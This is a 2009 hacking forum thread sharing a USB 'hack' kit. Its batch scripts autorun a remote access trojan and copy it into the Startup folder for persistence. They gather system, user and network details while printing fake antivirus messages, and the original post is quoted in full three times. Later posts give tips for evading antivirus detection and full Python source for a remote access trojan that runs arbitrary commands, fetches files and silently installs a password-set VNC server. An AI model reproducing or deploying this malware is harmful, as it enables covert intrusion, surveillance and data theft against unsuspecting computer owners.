Pizza Posted June 15, 2009 Share Posted June 15, 2009 Programs used Notepad to write batch scripts WindowsRAT.exe to open port 1337 IExpress to make the file and command(windowsrat.exe 1337) run in background http://virusscan.jotti.org/en/scanresult/5...ce1299d7fa9507e http://www.virustotal.com/analisis/120844c...366e-1245102553 not detected. this is just a basic thing. autorun.bat this will start when you plug in the usb drive (there is a autorun.inf on it but if computer has autorun disabled this is the file you should start) @echo off start /min launch.exe cls start /min launch.bat cls exit launch.exe has windowsrat.exe ( i did not write this i downloaded this from somewhere i think its from packet storm ) i used iexpress and put windowsrat.exe in it and it will run in background, the command windowsrat.exe 1337 is executed server is on port 1337 now you can connect to it using telnet. launch.bat this will be minimized but just incase someone opens the window it will have false messages. this you can see puts launch.exe in system32 and copies startupsystem.bat to users startup folder. this also collects ip address and then you can telnet to that ip address and port 1337 echo off copy launch.exe C:\Windows\System32 cls copy startupsystem.bat "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup" cls mkdir \Information\%USERNAME% cls Echo Anti-Virus Portable systeminfo > \Information\%USERNAME%\%USERNAME%sysinfo.txt cls Echo Anti-Virus Portable arp -a > \Information\%USERNAME%\%USERNAME%arp.txt cls Echo Searching and Removing Virus netstat -a > \Information\%USERNAME%\%USERNAME%netstat.txt cls Echo Searching and Removing Virus ipconfig > \Information\%USERNAME%\%USERNAME%ipconfig.txt cls Echo Searching and Removing Virus tasklist > \Information\%USERNAME%\%USERNAME%task.txt cls Echo Searching and Removing Virus net group > \Information\%USERNAME%\%USERNAME%group.txt cls Echo Searching and Removing Virus net localgroup > \Information\%USERNAME%\%USERNAME%localgroup.txt cls Echo Searching and Removing Virus net share > \Information\%USERNAME%\%USERNAME%share.txt cls Echo Searching and Removing Virus net use > \Information\%USERNAME%\%USERNAME%use.txt cls Echo Searching and Removing Virus net user > \Information\%USERNAME%\%USERNAME%users.txt cls Echo No Virus Found net view > \Information\%USERNAME%\%USERNAME%view.txt Echo No Virus Found cls exit startupsystem.bat this will start launch.exe when computer startups and this user logs in i tried to make it a service but i couldnt...if you can you should do that. start launch.exe exit removal.bat it deletes launch.exe from sys32 and deletes startupsystem.bat... @echo off del "C:\Windows\System32\Launch.exe" cls del "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\startupsystem.bat" cls exit you should have autorun disabled. and monitor your startup folder i think some anti spyware do it but its good if you check it. i am not a coder, but if you are you can improve this..DO IT. Download: http://www.2shared.com/file/6329193/806de49d/USBHACK.html -Pizza (aka JPizza) Quote Link to comment Share on other sites More sharing options...
Juf Posted June 20, 2009 Share Posted June 20, 2009 Programs used Notepad to write batch scripts WindowsRAT.exe to open port 1337 IExpress to make the file and command(windowsrat.exe 1337) run in background http://virusscan.jotti.org/en/scanresult/5...ce1299d7fa9507e http://www.virustotal.com/analisis/120844c...366e-1245102553 not detected. this is just a basic thing. autorun.bat this will start when you plug in the usb drive (there is a autorun.inf on it but if computer has autorun disabled this is the file you should start) @echo off start /min launch.exe cls start /min launch.bat cls exit launch.exe has windowsrat.exe ( i did not write this i downloaded this from somewhere i think its from packet storm ) i used iexpress and put windowsrat.exe in it and it will run in background, the command windowsrat.exe 1337 is executed server is on port 1337 now you can connect to it using telnet. launch.bat this will be minimized but just incase someone opens the window it will have false messages. this you can see puts launch.exe in system32 and copies startupsystem.bat to users startup folder. this also collects ip address and then you can telnet to that ip address and port 1337 echo off copy launch.exe C:\Windows\System32 cls copy startupsystem.bat "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup" cls mkdir \Information\%USERNAME% cls Echo Anti-Virus Portable systeminfo > \Information\%USERNAME%\%USERNAME%sysinfo.txt cls Echo Anti-Virus Portable arp -a > \Information\%USERNAME%\%USERNAME%arp.txt cls Echo Searching and Removing Virus netstat -a > \Information\%USERNAME%\%USERNAME%netstat.txt cls Echo Searching and Removing Virus ipconfig > \Information\%USERNAME%\%USERNAME%ipconfig.txt cls Echo Searching and Removing Virus tasklist > \Information\%USERNAME%\%USERNAME%task.txt cls Echo Searching and Removing Virus net group > \Information\%USERNAME%\%USERNAME%group.txt cls Echo Searching and Removing Virus net localgroup > \Information\%USERNAME%\%USERNAME%localgroup.txt cls Echo Searching and Removing Virus net share > \Information\%USERNAME%\%USERNAME%share.txt cls Echo Searching and Removing Virus net use > \Information\%USERNAME%\%USERNAME%use.txt cls Echo Searching and Removing Virus net user > \Information\%USERNAME%\%USERNAME%users.txt cls Echo No Virus Found net view > \Information\%USERNAME%\%USERNAME%view.txt Echo No Virus Found cls exit startupsystem.bat this will start launch.exe when computer startups and this user logs in i tried to make it a service but i couldnt...if you can you should do that. start launch.exe exit removal.bat it deletes launch.exe from sys32 and deletes startupsystem.bat... @echo off del "C:\Windows\System32\Launch.exe" cls del "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\startupsystem.bat" cls exit you should have autorun disabled. and monitor your startup folder i think some anti spyware do it but its good if you check it. i am not a coder, but if you are you can improve this..DO IT. Download: http://www.2shared.com/file/6329193/806de49d/USBHACK.html -Pizza (aka JPizza) add (this simple code :)) Title Anti-Virus Scanning... Color 0a For affect :) Quote Link to comment Share on other sites More sharing options...
Pizza Posted July 7, 2009 Author Share Posted July 7, 2009 new version includes vnc server... http://www.2shared.com/file/6598998/99d9c4/usb2.html Quote Link to comment Share on other sites More sharing options...
mR.xx Posted July 20, 2009 Share Posted July 20, 2009 new version includes vnc server... http://www.2shared.com/file/6598998/99d9c4/usb2.html nice modify but why launch2.EXE detected by antivirus ? winvnc.exe i'm download form web site UltraVNC_1.0.6.4 not detected by antivirus can give me file .SED plz I wanna put all file by my self ;) Quote Link to comment Share on other sites More sharing options...
messsy Posted July 21, 2009 Share Posted July 21, 2009 it will get detected more and more if you upload to virustotal as they distribute samples, for things like this you should use hXXp://scanner.novirusthanks.org and tick the do not distribute box ;) Quote Link to comment Share on other sites More sharing options...
Pizza Posted July 21, 2009 Author Share Posted July 21, 2009 it will get detected more and more if you upload to virustotal as they distribute samples, for things like this you should use hXXp://scanner.novirusthanks.org and tick the do not distribute box ;) thank you. Quote Link to comment Share on other sites More sharing options...
X3N Posted July 22, 2009 Share Posted July 22, 2009 how is this any better than what has already been released for the switchblade... Quote Link to comment Share on other sites More sharing options...
Pizza Posted July 22, 2009 Author Share Posted July 22, 2009 X3N i think some tools on switchblade are detected by AV, and i dont know....i was bored okay.. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted July 22, 2009 Share Posted July 22, 2009 Here is a RAT i have been working on in python. Its not done. Download Terry the Trojan and use that as the client to send/recieve data. from Tkinter import * from tkMessageBox import * from ScrolledText import * import socket import sys portvar = 2727 try: Â Â Â Â if sys.argv[1] == "/port": Â Â Â Â Â Â Â Â try: Â Â Â Â Â Â Â Â Â Â Â Â portvar = int(sys.argv[2]) Â Â Â Â Â Â Â Â except: Â Â Â Â Â Â Â Â Â Â Â Â portvar = 2727 except: Â Â Â Â portvar = 2727 def std(string): Â Â Â Â stdbox.config(state=NORMAL) Â Â Â Â stdbox.insert(END,"" + string + "\n") Â Â Â Â stdbox.config(state=DISABLED) def cnnect(var="poo"): Â Â Â Â sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) Â Â Â Â success = 1 Â Â Â Â try: Â Â Â Â Â Â Â Â sockt.connect((ipbox.get(),portvar)) Â Â Â Â except: Â Â Â Â Â Â Â Â success = 0 Â Â Â Â Â Â Â Â std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.") Â Â Â Â if success == 1: Â Â Â Â Â Â Â Â sockt.send(cmdbox.get()) Â Â Â Â Â Â Â Â retdata = sockt.recv(2048) Â Â Â Â Â Â Â Â std(retdata) root = Tk() root.title("Terry the Trojan") #FRAMES ipfrm = Frame(root) ipfrm.pack() cmdfrm = Frame(root) cmdfrm.pack() stdfrm = Frame(root) stdfrm.pack() #IP/Port Entry Widgets Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1) ipbox = Entry(ipfrm,width=50) ipbox.grid(row=1,column=2) #Returned output widgets stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000") stdbox.grid(row=1,column=1) #Command sending widgets cmdbox = Entry(cmdfrm,width=50) cmdbox.grid(row=1,column=1) Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2) cmdbox.bind("<Return>",cnnect) root.mainloop() HAH shit wrong code. Ill post it in a min. OK HERE is the RAT, sorry about that. You should be able to tell what the commands do. import socket,os,sys,urllib,re,ftplib from time import sleep port = 2727 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sockt.bind(('',port)) sockt.listen(1) while True: Â Â Â Â channel, details = sockt.accept() Â Â Â Â command = channel.recv(2048) Â Â Â Â if command == "kill": Â Â Â Â Â Â Â Â channel.send("Server trojan has been closed.") Â Â Â Â Â Â Â Â sys.exit() Â Â Â Â elif command == "ip": Â Â Â Â Â Â Â Â connect = s.connect(("www.whatismyipaddress.com", 80)) Â Â Â Â Â Â Â Â s.send('GET / HTTP/1.0\n\n') Â Â Â Â Â Â Â Â socketlines = s.recv(2048) Â Â Â Â Â Â Â Â lines = socketlines.split() Â Â Â Â Â Â Â Â ip = lines[len(lines) - 1] Â Â Â Â Â Â Â Â channel.send(ip) Â Â Â Â elif command == "whoami": Â Â Â Â Â Â Â Â channel.send(os.environ["USERNAME"]) Â Â Â Â elif command == "drive": Â Â Â Â Â Â Â Â channel.send(os.environ["HOMEDRIVE"]) Â Â Â Â elif command == "userfolder": Â Â Â Â Â Â Â Â channel.send(os.environ["HOMEPATH"]) Â Â Â Â elif command == "installvnc": Â Â Â Â Â Â Â Â urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe') Â Â Â Â Â Â Â Â fs=os.popen3('update.exe /sp- /verysilent','b') Â Â Â Â Â Â Â Â sleep(1) Â Â Â Â Â Â Â Â fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') Â Â Â Â Â Â Â Â sleep(1) Â Â Â Â Â Â Â Â fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') Â Â Â Â Â Â Â Â sleep(0.2) Â Â Â Â Â Â Â Â fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') Â Â Â Â Â Â Â Â sleep(0.5) Â Â Â Â Â Â Â Â fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') Â Â Â Â Â Â Â Â sleep(1) Â Â Â Â Â Â Â Â fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') Â Â Â Â Â Â Â Â sleep(0.3) Â Â Â Â Â Â Â Â fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') Â Â Â Â Â Â Â Â sleep(1) Â Â Â Â Â Â Â Â fs=os.popen3('net start "VNC Server"','b') Â Â Â Â Â Â Â Â fs=os.popen3('del update.exe','b') Â Â Â Â Â Â Â Â channel.send("VNC was installed, password is vncserv.") Â Â Â Â elif command == "netstat": Â Â Â Â Â Â Â Â fs=os.popen3('netstat -ano>windsys.ini','b') Â Â Â Â Â Â Â Â sleep(2) Â Â Â Â Â Â Â Â f = open('windsys.ini') Â Â Â Â Â Â Â Â channel.send(f.read()) Â Â Â Â Â Â Â Â f.close() Â Â Â Â elif command == "whereami": Â Â Â Â Â Â Â Â channel.send(os.getcwd()) Â Â Â Â elif command.startswith("download "): Â Â Â Â Â Â Â Â file = command.replace("download ", "") Â Â Â Â Â Â Â Â urllib.urlretrieve(file,"file.exe") Â Â Â Â Â Â Â Â channel.send("File downloaded. Saved as 'file.exe', rename extension")Â Â Â Â Â Â Â Â else: Â Â Â Â Â Â Â Â csuc = 1 Â Â Â Â Â Â Â Â try: Â Â Â Â Â Â Â Â Â Â Â Â fs=os.popen3(command,'b') Â Â Â Â Â Â Â Â except: Â Â Â Â Â Â Â Â Â Â Â Â csuc = 0 Â Â Â Â Â Â Â Â if csuc == 1: Â Â Â Â Â Â Â Â Â Â Â Â channel.send("Command Sucessful") Â Â Â Â Â Â Â Â else: Â Â Â Â Â Â Â Â Â Â Â Â channel.send("Command Failed") Â Â Â Â Â Â Â Â channel.close() Quote Link to comment Share on other sites More sharing options...
Christa Buchanan Posted July 24, 2009 Share Posted July 24, 2009 Programs used Notepad to write batch scripts WindowsRAT.exe to open port 1337 IExpress to make the file and command(windowsrat.exe 1337) run in background http://virusscan.jotti.org/en/scanresult/5...ce1299d7fa9507e http://www.virustotal.com/analisis/120844c...366e-1245102553 not detected. this is just a basic thing. autorun.bat this will start when you plug in the usb drive (there is a autorun.inf on it but if computer has autorun disabled this is the file you should start) @echo off start /min launch.exe cls start /min launch.bat cls exit launch.exe has windowsrat.exe ( i did not write this i downloaded this from somewhere i think its from packet storm ) i used iexpress and put windowsrat.exe in it and it will run in background, the command windowsrat.exe 1337 is executed server is on port 1337 now you can connect to it using telnet. launch.bat this will be minimized but just incase someone opens the window it will have false messages. this you can see puts launch.exe in system32 and copies startupsystem.bat to users startup folder. this also collects ip address and then you can telnet to that ip address and port 1337 echo off copy launch.exe C:\Windows\System32 cls copy startupsystem.bat "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup" cls mkdir \Information\%USERNAME% cls Echo Anti-Virus Portable systeminfo > \Information\%USERNAME%\%USERNAME%sysinfo.txt cls Echo Anti-Virus Portable arp -a > \Information\%USERNAME%\%USERNAME%arp.txt cls Echo Searching and Removing Virus netstat -a > \Information\%USERNAME%\%USERNAME%netstat.txt cls Echo Searching and Removing Virus ipconfig > \Information\%USERNAME%\%USERNAME%ipconfig.txt cls Echo Searching and Removing Virus tasklist > \Information\%USERNAME%\%USERNAME%task.txt cls Echo Searching and Removing Virus net group > \Information\%USERNAME%\%USERNAME%group.txt cls Echo Searching and Removing Virus net localgroup > \Information\%USERNAME%\%USERNAME%localgroup.txt cls Echo Searching and Removing Virus net share > \Information\%USERNAME%\%USERNAME%share.txt cls Echo Searching and Removing Virus net use > \Information\%USERNAME%\%USERNAME%use.txt cls Echo Searching and Removing Virus net user > \Information\%USERNAME%\%USERNAME%users.txt cls Echo No Virus Found net view > \Information\%USERNAME%\%USERNAME%view.txt Echo No Virus Found cls exit startupsystem.bat this will start launch.exe when computer startups and this user logs in i tried to make it a service but i couldnt...if you can you should do that. start launch.exe exit removal.bat it deletes launch.exe from sys32 and deletes startupsystem.bat... @echo off del "C:\Windows\System32\Launch.exe" cls del "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\startupsystem.bat" cls exit you should have autorun disabled. and monitor your startup folder i think some anti spyware do it but its good if you check it. i am not a coder, but if you are you can improve this..DO IT. Download: http://www.2shared.com/file/6329193/806de49d/USBHACK.html -Pizza (aka JPizza) the download link is not working all i could see on that site is spam and advertising please upload to new site so i could download it thank you. Quote Link to comment Share on other sites More sharing options...
Christa Buchanan Posted July 24, 2009 Share Posted July 24, 2009 oh never mind that site is a spam site full of popup and advert Quote Link to comment Share on other sites More sharing options...
Pizza Posted July 25, 2009 Author Share Posted July 25, 2009 http://www.mediafire.com/?sharekey=33abec5...04e75f6e8ebb871 that should work. sorry. Quote Link to comment Share on other sites More sharing options...
X3N Posted July 26, 2009 Share Posted July 26, 2009 i wrote a couple netcat clones in python.... i dont think ill release my code though cause i dont feel like having it ever get blacklisted by antivirus... dingleberries... you should check out the twisted python library for more advanced networking capabillities its pretty nice to work with... Quote Link to comment Share on other sites More sharing options...
Pizza Posted July 27, 2009 Author Share Posted July 27, 2009 heard about ncat yet? http://nmap.org/ncat/ this is good video: http://www.irongeek.com/i.php?page=videos/ncat-nmap-netcat Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.